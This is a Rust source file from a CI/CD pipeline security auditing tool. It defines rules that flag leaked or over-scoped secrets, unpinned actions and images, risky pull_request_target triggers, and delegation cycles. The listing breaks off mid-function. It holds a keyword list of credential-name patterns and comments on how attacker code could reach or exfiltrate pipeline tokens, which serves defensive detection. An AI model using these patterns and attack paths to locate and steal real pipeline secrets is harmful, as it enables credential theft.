Skip to main content

taudit_core/
rules.rs

1use crate::finding::{
2    Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
3};
4use crate::graph::{
5    is_docker_digest_pinned, is_pin_semantically_valid, AuthorityGraph, EdgeKind, IdentityScope,
6    NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
7    META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
8    META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
9    META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
10    META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
11    META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
12    META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
13    META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
14    META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
15    META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
16    META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
17    META_WORKSPACE_CLEAN, META_WRITES_ENV_GATE,
18};
19use crate::propagation;
20
21/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
22///
23/// **Clustering (v0.9.x):** all paths from the same root authority node
24/// (Secret/Identity) collapse into ONE finding per source. The single
25/// finding carries every reached sink in `nodes_involved` — `[source,
26/// sink_a, sink_b, ...]` — and lists them in the message. This matches
27/// the SARIF fingerprint behaviour (which already collapses per
28/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
29/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
30/// identical findings as it propagated through a matrix workflow.
31///
32/// Severity graduation (per-path, then max-over-paths):
33/// - Untrusted sink: Critical (real risk — unpinned code with authority)
34/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
35/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
36///   token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
37///
38/// When every path in a cluster crosses an environment approval gate,
39/// the cluster's severity is downgraded one step (mirroring the
40/// per-path downgrade the previous emitter applied).
41pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
42    let paths = propagation::propagation_analysis(graph, max_hops);
43
44    // Group by root authority source node. We preserve insertion order so
45    // findings come out in the same order they would have under per-hop
46    // emission (callers and golden-file tests rely on the source-first
47    // ordering of authority_propagation findings).
48    let mut order: Vec<NodeId> = Vec::new();
49    let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
50        std::collections::HashMap::new();
51
52    for path in paths.into_iter().filter(|p| p.crossed_boundary) {
53        groups
54            .entry(path.source)
55            .or_insert_with(|| {
56                order.push(path.source);
57                Vec::new()
58            })
59            .push(path);
60    }
61
62    let mut findings = Vec::with_capacity(order.len());
63
64    for source_id in order {
65        let paths = match groups.remove(&source_id) {
66            Some(p) if !p.is_empty() => p,
67            _ => continue,
68        };
69
70        let source_name = graph
71            .node(source_id)
72            .map(|n| n.name.as_str())
73            .unwrap_or("?")
74            .to_string();
75        let source_is_constrained = graph
76            .node(source_id)
77            .and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
78            .map(|s| s == "constrained")
79            .unwrap_or(false);
80        let source_is_oidc = graph
81            .node(source_id)
82            .and_then(|n| n.metadata.get(META_OIDC))
83            .map(|v| v == "true")
84            .unwrap_or(false);
85
86        // Walk every path in the cluster and compute (severity, gated?,
87        // sink id, representative path) — the cluster takes the max
88        // severity (i.e. the worst sink wins). Severity is downgraded
89        // only when every path in the cluster crosses an env-approval
90        // gate; if even one path bypasses the gate, the cluster is not
91        // downgraded.
92        let mut worst_sev = Severity::Info;
93        let mut all_gated = true;
94        let mut best_path: Option<propagation::PropagationPath> = None;
95        let mut sink_ids: Vec<NodeId> = Vec::new();
96        let mut seen_sinks = std::collections::HashSet::new();
97
98        for path in &paths {
99            let sink_is_pinned = graph
100                .node(path.sink)
101                .map(|n| {
102                    n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
103                })
104                .unwrap_or(false);
105
106            let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
107                Severity::Medium
108            } else if sink_is_pinned && !source_is_oidc {
109                Severity::High
110            } else {
111                Severity::Critical
112            };
113
114            let gated = path_crosses_env_approval(graph, path);
115            let effective_severity = if gated {
116                downgrade_one_step(base_severity)
117            } else {
118                base_severity
119            };
120
121            if !gated {
122                all_gated = false;
123            }
124
125            if effective_severity < worst_sev {
126                worst_sev = effective_severity;
127                best_path = Some(path.clone());
128            }
129
130            if seen_sinks.insert(path.sink) {
131                sink_ids.push(path.sink);
132            }
133        }
134
135        // Build sink name list for the message. Truncate aggressively past
136        // ~5 names to avoid an unbounded message string on extreme inputs;
137        // the full set is still in `nodes_involved`.
138        let mut sink_names: Vec<String> = sink_ids
139            .iter()
140            .filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
141            .collect();
142        let truncated = if sink_names.len() > 5 {
143            let extra = sink_names.len() - 5;
144            sink_names.truncate(5);
145            format!(", …+{extra} more")
146        } else {
147            String::new()
148        };
149        let sink_list = sink_names.join(", ");
150
151        let suffix = if all_gated && !paths.is_empty() {
152            " (mitigated: environment approval gate)"
153        } else {
154            ""
155        };
156
157        let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
158        nodes_involved.push(source_id);
159        nodes_involved.extend(sink_ids.iter().copied());
160
161        let n = paths.len();
162        let unique_sinks = sink_ids.len();
163        let message = if unique_sinks == 1 {
164            format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
165        } else {
166            format!(
167                "{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
168            )
169        };
170
171        let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
172
173        findings.push(Finding {
174            severity: worst_sev,
175            category: FindingCategory::AuthorityPropagation,
176            nodes_involved,
177            message,
178            recommendation: Recommendation::TsafeRemediation {
179                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
180                explanation: format!("Scope {source_name} to only the steps that need it"),
181            },
182            path: best_path,
183            source: FindingSource::BuiltIn,
184            extras: FindingExtras::default(),
185        });
186    }
187
188    findings
189}
190
191/// Returns true if any node touched by `path` (source, sink, or any edge
192/// endpoint along the way) carries META_ENV_APPROVAL = "true".
193fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
194    let has_marker = |id: NodeId| {
195        graph
196            .node(id)
197            .and_then(|n| n.metadata.get(META_ENV_APPROVAL))
198            .map(|v| v == "true")
199            .unwrap_or(false)
200    };
201
202    if has_marker(path.source) || has_marker(path.sink) {
203        return true;
204    }
205
206    for &edge_id in &path.edges {
207        if let Some(edge) = graph.edge(edge_id) {
208            if has_marker(edge.from) || has_marker(edge.to) {
209                return true;
210            }
211        }
212    }
213    false
214}
215
216/// Reduce a severity by one step. Critical→High, High→Medium, Medium→Low.
217/// Low and Info are already at the floor of meaningful reduction and are
218/// returned unchanged.
219fn downgrade_one_step(severity: Severity) -> Severity {
220    match severity {
221        Severity::Critical => Severity::High,
222        Severity::High => Severity::Medium,
223        Severity::Medium => Severity::Low,
224        Severity::Low => Severity::Low,
225        Severity::Info => Severity::Info,
226    }
227}
228
229/// MVP Rule 2: Identity scope broader than actual usage.
230///
231/// Uses `IdentityScope` classification from the precision layer. Broad and
232/// Unknown scopes are flagged — Unknown is treated as risky because if we
233/// can't determine the scope, we shouldn't assume it's safe.
234pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
235    let mut findings = Vec::new();
236
237    for identity in graph.nodes_of_kind(NodeKind::Identity) {
238        let granted_scope = identity
239            .metadata
240            .get(META_PERMISSIONS)
241            .cloned()
242            .unwrap_or_default();
243
244        // Use IdentityScope from metadata if set by parser, otherwise classify from permissions
245        let scope = identity
246            .metadata
247            .get(META_IDENTITY_SCOPE)
248            .and_then(|s| match s.as_str() {
249                "broad" => Some(IdentityScope::Broad),
250                "constrained" => Some(IdentityScope::Constrained),
251                "unknown" => Some(IdentityScope::Unknown),
252                _ => None,
253            })
254            .unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
255
256        // Broad or Unknown scope — flag it. Unknown is treated as risky.
257        let (should_flag, severity) = match scope {
258            IdentityScope::Broad => (true, Severity::High),
259            IdentityScope::Unknown => (true, Severity::Medium),
260            IdentityScope::Constrained => (false, Severity::Info),
261        };
262
263        if !should_flag {
264            continue;
265        }
266
267        let accessor_steps: Vec<_> = graph
268            .edges_to(identity.id)
269            .filter(|e| e.kind == EdgeKind::HasAccessTo)
270            .filter_map(|e| graph.node(e.from))
271            .collect();
272
273        if !accessor_steps.is_empty() {
274            let scope_label = match scope {
275                IdentityScope::Broad => "broad",
276                IdentityScope::Unknown => "unknown (treat as risky)",
277                IdentityScope::Constrained => "constrained",
278            };
279
280            // Service connections are ADO-portal-configured identities; their
281            // scope is not governed by the pipeline-level `permissions:` YAML
282            // block. Emit a distinct message and recommendation so users aren't
283            // confused into thinking adding `permissions: contents: none` will
284            // fix this finding.
285            let is_service_connection = identity
286                .metadata
287                .get(META_SERVICE_CONNECTION)
288                .map(|v| v == "true")
289                .unwrap_or(false);
290
291            let (message, recommendation) = if is_service_connection {
292                (
293                    format!(
294                        "Service connection '{}' has {} scope — \
295                         scope is controlled in the ADO portal, not by the pipeline \
296                         permissions: YAML block",
297                        identity.name, scope_label
298                    ),
299                    Recommendation::Manual {
300                        action: format!(
301                            "Narrow '{}' in ADO Project Settings → Service Connections → \
302                             Security, or replace static credentials with workload identity \
303                             federation (OIDC) so no long-lived secret is stored.",
304                            identity.name
305                        ),
306                    },
307                )
308            } else {
309                (
310                    format!(
311                        "{} has {} scope (permissions: '{}') — likely broader than needed",
312                        identity.name, scope_label, granted_scope
313                    ),
314                    Recommendation::ReducePermissions {
315                        current: granted_scope.clone(),
316                        minimum: "{ contents: read }".into(),
317                    },
318                )
319            };
320
321            findings.push(Finding {
322                severity,
323                category: FindingCategory::OverPrivilegedIdentity,
324                path: None,
325                nodes_involved: std::iter::once(identity.id)
326                    .chain(accessor_steps.iter().map(|n| n.id))
327                    .collect(),
328                message,
329                recommendation,
330                source: FindingSource::BuiltIn,
331                // Working out the minimum-needed scope across N jobs is a
332                // ~1 hour audit, not a flag flip — Small.
333                extras: FindingExtras {
334                    time_to_fix: Some(crate::finding::FixEffort::Small),
335                    ..FindingExtras::default()
336                },
337            });
338        }
339    }
340
341    findings
342}
343
344/// MVP Rule 3: Third-party action/image without SHA pin.
345///
346/// **Severity tiering (v0.9.x):** the rule used to fire at a single severity
347/// regardless of which action was unpinned, which produced uniform noise on
348/// monorepo CI files where the action owner determined the actual risk.
349/// The blue-team corpus report (`MEMORY/.../blueteam-corpus-defense.md`)
350/// recommended splitting:
351///   * Same-repo composite action (`./.github/actions/*`) → **Info**.
352///     The action lives in the consumer's own repo — there's no external
353///     supply-chain surface; pinning is a hygiene preference, not a
354///     control gap.
355///   * Owner is a well-known first-party org (`actions/*`, `github/*`,
356///     `actions-rs/*`, `docker/*`) → **Medium**. These are GitHub-org or
357///     adjacent tooling maintainers; the supply-chain surface exists but
358///     is operationally narrow and well-monitored.
359///   * Anything else (`random-org/foo@v1`, etc.) → **High**. Unbounded
360///     supply-chain risk — this is the case the rule was originally
361///     designed for.
362///
363/// Deduplicates by action reference — the same action used in multiple jobs
364/// produces multiple Image nodes but should only be flagged once.
365pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
366    let mut findings = Vec::new();
367    let mut seen = std::collections::HashSet::new();
368
369    for image in graph.nodes_of_kind(NodeKind::Image) {
370        // Container images are handled by floating_image — skip here to avoid
371        // double-flagging the same node as both UnpinnedAction and FloatingImage.
372        if image
373            .metadata
374            .get(META_CONTAINER)
375            .map(|v| v == "true")
376            .unwrap_or(false)
377        {
378            continue;
379        }
380
381        // Self-hosted runner labels live in the FirstParty zone but aren't
382        // an action reference — they have no `@version` to pin and the rule
383        // would otherwise flag every `runs-on: self-hosted` line.
384        if image
385            .metadata
386            .get(META_SELF_HOSTED)
387            .map(|v| v == "true")
388            .unwrap_or(false)
389        {
390            continue;
391        }
392
393        // Same-repo composite actions (`./.github/actions/foo`) sit in the
394        // FirstParty zone. Other FirstParty Image nodes (e.g. self-hosted
395        // pool labels, hosted runner names) are not flaggable references —
396        // we admit FirstParty into the severity ladder ONLY when the name
397        // is the relative-path form, and emit Info for it.
398        let is_local_composite = image.name.starts_with("./");
399        if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
400            continue;
401        }
402
403        // Deduplicate: same action reference flagged once
404        if !seen.insert(&image.name) {
405            continue;
406        }
407
408        let has_digest = image.metadata.contains_key(META_DIGEST);
409
410        if has_digest || is_pin_semantically_valid(&image.name) {
411            continue;
412        }
413
414        // Tier severity by owner. `is_local_composite` already handled the
415        // same-repo case; for everything else, look at the `<owner>/...`
416        // prefix and decide first-party vs unknown supplier.
417        let severity = if is_local_composite {
418            Severity::Info
419        } else if is_well_known_first_party_action(&image.name) {
420            Severity::Medium
421        } else {
422            Severity::High
423        };
424
425        findings.push(Finding {
426            severity,
427            category: FindingCategory::UnpinnedAction,
428            path: None,
429            nodes_involved: vec![image.id],
430            message: format!("{} is not pinned to a SHA digest", image.name),
431            recommendation: Recommendation::PinAction {
432                current: image.name.clone(),
433                pinned: format!(
434                    "{}@<sha256-digest>",
435                    image.name.split('@').next().unwrap_or(&image.name)
436                ),
437            },
438            source: FindingSource::BuiltIn,
439            // Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
440            extras: FindingExtras {
441                time_to_fix: Some(crate::finding::FixEffort::Trivial),
442                ..FindingExtras::default()
443            },
444        });
445    }
446
447    findings
448}
449
450/// Owners we treat as well-known first-party for the purpose of severity
451/// tiering. The list is intentionally short and conservative — adding an
452/// org here downgrades every unpinned action it ships, so the bar is
453/// "GitHub-maintained or directly adjacent core tooling." Anything else
454/// stays at the High default.
455fn is_well_known_first_party_action(uses: &str) -> bool {
456    // Strip an optional `@<ref>` suffix, then take the leading owner segment.
457    let bare = uses.split('@').next().unwrap_or(uses);
458    let owner = bare.split('/').next().unwrap_or("");
459    matches!(owner, "actions" | "github" | "actions-rs" | "docker")
460}
461
462/// MVP Rule 4: Untrusted step has direct access to secret/identity.
463pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
464    let mut findings = Vec::new();
465
466    for step in graph.nodes_in_zone(TrustZone::Untrusted) {
467        if step.kind != NodeKind::Step {
468            continue;
469        }
470
471        // Check if this untrusted step directly accesses any authority source
472        for edge in graph.edges_from(step.id) {
473            if edge.kind != EdgeKind::HasAccessTo {
474                continue;
475            }
476
477            if let Some(target) = graph.node(edge.to) {
478                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
479                    let cli_flag_exposed = target
480                        .metadata
481                        .get(META_CLI_FLAG_EXPOSED)
482                        .map(|v| v == "true")
483                        .unwrap_or(false);
484
485                    // Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
486                    // accessible to all tasks by design. Flag at Info — real but not actionable
487                    // as a misconfiguration. Explicit secrets/service connections stay Critical.
488                    let is_implicit = target
489                        .metadata
490                        .get(META_IMPLICIT)
491                        .map(|v| v == "true")
492                        .unwrap_or(false);
493
494                    let recommendation = if target.kind == NodeKind::Secret {
495                        if cli_flag_exposed {
496                            Recommendation::Manual {
497                                action: format!(
498                                    "Move '{}' from -var flag to TF_VAR_{} env var — \
499                                     -var values appear in pipeline logs and Terraform plan output",
500                                    target.name, target.name
501                                ),
502                            }
503                        } else {
504                            Recommendation::CellosRemediation {
505                                reason: format!(
506                                    "Untrusted step '{}' has direct access to secret '{}'",
507                                    step.name, target.name
508                                ),
509                                spec_hint: format!(
510                                    "cellos run --network deny-all --broker env:{}",
511                                    target.name
512                                ),
513                            }
514                        }
515                    } else {
516                        // Identity branch — for implicit platform tokens, add a CellOS
517                        // compensating-control note since the token cannot be un-injected
518                        // at the platform layer.
519                        let minimum = if is_implicit {
520                            "minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
521                        } else {
522                            "minimal required scope".into()
523                        };
524                        Recommendation::ReducePermissions {
525                            current: target
526                                .metadata
527                                .get(META_PERMISSIONS)
528                                .cloned()
529                                .unwrap_or_else(|| "unknown".into()),
530                            minimum,
531                        }
532                    };
533
534                    let log_exposure_note = if cli_flag_exposed {
535                        " (passed as -var flag — value visible in pipeline logs)"
536                    } else {
537                        ""
538                    };
539
540                    let (severity, message) =
541                        if is_implicit {
542                            (
543                                Severity::Info,
544                                format!(
545                                "Untrusted step '{}' has structural access to implicit {} '{}' \
546                                 (platform-injected — all tasks receive this token by design){}",
547                                step.name,
548                                if target.kind == NodeKind::Secret { "secret" } else { "identity" },
549                                target.name,
550                                log_exposure_note,
551                            ),
552                            )
553                        } else {
554                            (
555                                Severity::Critical,
556                                format!(
557                                    "Untrusted step '{}' has direct access to {} '{}'{}",
558                                    step.name,
559                                    if target.kind == NodeKind::Secret {
560                                        "secret"
561                                    } else {
562                                        "identity"
563                                    },
564                                    target.name,
565                                    log_exposure_note,
566                                ),
567                            )
568                        };
569
570                    findings.push(Finding {
571                        severity,
572                        category: FindingCategory::UntrustedWithAuthority,
573                        path: None,
574                        nodes_involved: vec![step.id, target.id],
575                        message,
576                        recommendation,
577                        source: FindingSource::BuiltIn,
578                        extras: FindingExtras::default(),
579                    });
580                }
581            }
582        }
583    }
584
585    findings
586}
587
588/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
589pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
590    let mut findings = Vec::new();
591
592    for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
593        // Find producer(s)
594        let producers: Vec<_> = graph
595            .edges_to(artifact.id)
596            .filter(|e| e.kind == EdgeKind::Produces)
597            .filter_map(|e| graph.node(e.from))
598            .collect();
599
600        // Find consumer(s) — Consumes edges go artifact -> step
601        let consumers: Vec<_> = graph
602            .edges_from(artifact.id)
603            .filter(|e| e.kind == EdgeKind::Consumes)
604            .filter_map(|e| graph.node(e.to))
605            .collect();
606
607        for producer in &producers {
608            for consumer in &consumers {
609                // Skip intra-job pairs: upload → download within the same job
610                // is a legitimate temp-file pattern. The trust crossing is only
611                // meaningful when the artifact crosses a job boundary.
612                let prod_job = producer
613                    .metadata
614                    .get(META_JOB_NAME)
615                    .map(String::as_str)
616                    .unwrap_or("");
617                let cons_job = consumer
618                    .metadata
619                    .get(META_JOB_NAME)
620                    .map(String::as_str)
621                    .unwrap_or("");
622                if !prod_job.is_empty() && prod_job == cons_job {
623                    continue;
624                }
625
626                if producer.trust_zone.is_lower_than(&consumer.trust_zone) {
627                    findings.push(Finding {
628                        severity: Severity::High,
629                        category: FindingCategory::ArtifactBoundaryCrossing,
630                        path: None,
631                        nodes_involved: vec![producer.id, artifact.id, consumer.id],
632                        message: format!(
633                            "Untrusted artifact '{}' produced by '{}' ({:?}) consumed by privileged step '{}' ({:?})",
634                            artifact.name,
635                            producer.name,
636                            producer.trust_zone,
637                            consumer.name,
638                            consumer.trust_zone
639                        ),
640                        recommendation: Recommendation::Manual {
641                            action: "Ensure the artifact producer runs in a trusted job; restrict which jobs can consume the artifact using platform-specific controls (e.g. environment protection rules, manual approval gates).".into(),
642                        },
643                        source: FindingSource::BuiltIn,
644                        extras: FindingExtras::default(),
645                    });
646                }
647            }
648        }
649    }
650
651    findings
652}
653
654/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
655///
656/// Heuristic: secrets named like AWS keys, API keys, passwords, or private keys
657/// are likely static credentials that should be replaced with OIDC federation.
658pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
659    const STATIC_PATTERNS: &[&str] = &[
660        "AWS_ACCESS_KEY",
661        "AWS_SECRET_ACCESS_KEY",
662        "_API_KEY",
663        "_APIKEY",
664        "_PASSWORD",
665        "_PASSWD",
666        "_PRIVATE_KEY",
667        "_SECRET_KEY",
668        "_SERVICE_ACCOUNT",
669        "_SIGNING_KEY",
670    ];
671
672    let mut findings = Vec::new();
673
674    for secret in graph.nodes_of_kind(NodeKind::Secret) {
675        let upper = secret.name.to_uppercase();
676        let is_static = STATIC_PATTERNS.iter().any(|p| upper.contains(p));
677
678        if is_static {
679            findings.push(Finding {
680                severity: Severity::Low,
681                category: FindingCategory::LongLivedCredential,
682                path: None,
683                nodes_involved: vec![secret.id],
684                message: format!(
685                    "'{}' looks like a long-lived static credential",
686                    secret.name
687                ),
688                recommendation: Recommendation::FederateIdentity {
689                    static_secret: secret.name.clone(),
690                    oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
691                },
692                source: FindingSource::BuiltIn,
693                // Migrating from PATs to OIDC across an org touches identity
694                // policy, IAM trust relationships, and every downstream
695                // consumer of the credential — Large effort.
696                extras: FindingExtras {
697                    time_to_fix: Some(crate::finding::FixEffort::Large),
698                    ..FindingExtras::default()
699                },
700            });
701        }
702    }
703
704    findings
705}
706
707/// Tier 6 Rule: Container image without Docker digest pinning.
708///
709/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
710/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
711/// by image name (same image in multiple jobs flags once).
712pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
713    let mut findings = Vec::new();
714    let mut seen = std::collections::HashSet::new();
715
716    for image in graph.nodes_of_kind(NodeKind::Image) {
717        let is_container = image
718            .metadata
719            .get(META_CONTAINER)
720            .map(|v| v == "true")
721            .unwrap_or(false);
722
723        if !is_container {
724            continue;
725        }
726
727        if !seen.insert(image.name.as_str()) {
728            continue;
729        }
730
731        if !is_docker_digest_pinned(&image.name) {
732            findings.push(Finding {
733                severity: Severity::Medium,
734                category: FindingCategory::FloatingImage,
735                path: None,
736                nodes_involved: vec![image.id],
737                message: format!("Container image '{}' is not pinned to a digest", image.name),
738                recommendation: Recommendation::PinAction {
739                    current: image.name.clone(),
740                    pinned: format!(
741                        "{}@sha256:<digest>",
742                        image.name.split(':').next().unwrap_or(&image.name)
743                    ),
744                },
745                source: FindingSource::BuiltIn,
746                // `docker pull <image>` once and append `@sha256:<digest>` —
747                // identical mechanical fix to unpinned_action. Trivial.
748                extras: FindingExtras {
749                    time_to_fix: Some(crate::finding::FixEffort::Trivial),
750                    ..FindingExtras::default()
751                },
752            });
753        }
754    }
755
756    findings
757}
758
759/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
760///
761/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
762/// credentials are accessible to all subsequent steps (and to any process with filesystem
763/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
764pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
765    let mut findings = Vec::new();
766
767    for edge in &graph.edges {
768        if edge.kind != EdgeKind::PersistsTo {
769            continue;
770        }
771
772        let Some(step) = graph.node(edge.from) else {
773            continue;
774        };
775        let Some(target) = graph.node(edge.to) else {
776            continue;
777        };
778
779        findings.push(Finding {
780            severity: Severity::High,
781            category: FindingCategory::PersistedCredential,
782            path: None,
783            nodes_involved: vec![step.id, target.id],
784            message: format!(
785                "'{}' persists '{}' to disk via persistCredentials: true — \
786                 credential remains in .git/config and is accessible to all subsequent steps",
787                step.name, target.name
788            ),
789            recommendation: Recommendation::Manual {
790                action: "Remove persistCredentials: true from the checkout step. \
791                         Pass credentials explicitly only to steps that need them."
792                    .into(),
793            },
794            source: FindingSource::BuiltIn,
795            extras: FindingExtras::default(),
796        });
797    }
798
799    findings
800}
801
802/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
803///
804/// Fires once per workflow when the graph-level `META_TRIGGER` indicates a high-risk
805/// trigger and at least one step holds authority. Aggregates all involved nodes.
806pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
807    let trigger = match graph.metadata.get(META_TRIGGER) {
808        Some(t) => t.clone(),
809        None => return Vec::new(),
810    };
811
812    let severity = match trigger.as_str() {
813        "pull_request_target" => Severity::Critical,
814        "pr" => Severity::High,
815        _ => return Vec::new(),
816    };
817
818    // Collect steps that hold authority (HasAccessTo a Secret or Identity)
819    let mut steps_with_authority: Vec<NodeId> = Vec::new();
820    let mut authority_targets: Vec<NodeId> = Vec::new();
821
822    for step in graph.nodes_of_kind(NodeKind::Step) {
823        let mut step_holds_authority = false;
824        for edge in graph.edges_from(step.id) {
825            if edge.kind != EdgeKind::HasAccessTo {
826                continue;
827            }
828            if let Some(target) = graph.node(edge.to) {
829                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
830                    step_holds_authority = true;
831                    if !authority_targets.contains(&target.id) {
832                        authority_targets.push(target.id);
833                    }
834                }
835            }
836        }
837        if step_holds_authority {
838            steps_with_authority.push(step.id);
839        }
840    }
841
842    if steps_with_authority.is_empty() {
843        return Vec::new();
844    }
845
846    let n = steps_with_authority.len();
847    let mut nodes_involved = steps_with_authority.clone();
848    nodes_involved.extend(authority_targets);
849
850    vec![Finding {
851        severity,
852        category: FindingCategory::TriggerContextMismatch,
853        path: None,
854        nodes_involved,
855        message: format!(
856            "Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
857        ),
858        recommendation: Recommendation::Manual {
859            action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
860        },
861        source: FindingSource::BuiltIn,
862        extras: FindingExtras::default(),
863}]
864}
865
866/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
867///
868/// For each Step node: find all `DelegatesTo` edges to Image nodes where the trust zone
869/// is not FirstParty. If the same step also has `HasAccessTo` any Secret or Identity,
870/// emit one finding per delegation edge.
871pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
872    let mut findings = Vec::new();
873
874    for step in graph.nodes_of_kind(NodeKind::Step) {
875        // Collect authority sources this step holds
876        let authority_nodes: Vec<&_> = graph
877            .edges_from(step.id)
878            .filter(|e| e.kind == EdgeKind::HasAccessTo)
879            .filter_map(|e| graph.node(e.to))
880            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
881            .collect();
882
883        if authority_nodes.is_empty() {
884            continue;
885        }
886
887        // Find each DelegatesTo edge to a non-FirstParty Image
888        for edge in graph.edges_from(step.id) {
889            if edge.kind != EdgeKind::DelegatesTo {
890                continue;
891            }
892            let Some(target) = graph.node(edge.to) else {
893                continue;
894            };
895            if target.kind != NodeKind::Image {
896                continue;
897            }
898            if target.trust_zone == TrustZone::FirstParty {
899                continue;
900            }
901
902            let severity = match target.trust_zone {
903                TrustZone::Untrusted => Severity::Critical,
904                TrustZone::ThirdParty => Severity::High,
905                TrustZone::FirstParty => continue,
906            };
907
908            let authority_names: Vec<String> =
909                authority_nodes.iter().map(|n| n.name.clone()).collect();
910            let authority_label = authority_names.join(", ");
911
912            let mut nodes_involved = vec![step.id, target.id];
913            nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
914
915            findings.push(Finding {
916                severity,
917                category: FindingCategory::CrossWorkflowAuthorityChain,
918                path: None,
919                nodes_involved,
920                message: format!(
921                    "'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
922                    step.name, target.name, target.trust_zone, authority_label
923                ),
924                recommendation: Recommendation::Manual {
925                    action: format!(
926                        "Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
927                        target.name
928                    ),
929                },
930                source: FindingSource::BuiltIn,
931                        extras: FindingExtras::default(),
932});
933        }
934    }
935
936    findings
937}
938
939/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
940///
941/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
942/// collects all nodes that participate in any cycle. If any cycles exist, emits
943/// a single High-severity finding listing all cycle members.
944pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
945    let n = graph.nodes.len();
946    if n == 0 {
947        return Vec::new();
948    }
949
950    // Pre-build adjacency list for DelegatesTo edges only.
951    let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
952    for edge in &graph.edges {
953        if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
954            delegates_to[edge.from].push(edge.to);
955        }
956    }
957
958    let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
959    let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
960
961    for start in 0..n {
962        if color[start] != 0 {
963            continue;
964        }
965        color[start] = 1;
966        let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
967
968        loop {
969            let len = stack.len();
970            if len == 0 {
971                break;
972            }
973            let (node_id, edge_idx) = stack[len - 1];
974            if edge_idx < delegates_to[node_id].len() {
975                stack[len - 1].1 += 1;
976                let neighbor = delegates_to[node_id][edge_idx];
977                if color[neighbor] == 1 {
978                    // Back edge: cycle found. Collect every node between `neighbor`
979                    // (the cycle start) and `node_id` (the cycle end) along the
980                    // current DFS stack. All stack entries are gray by construction,
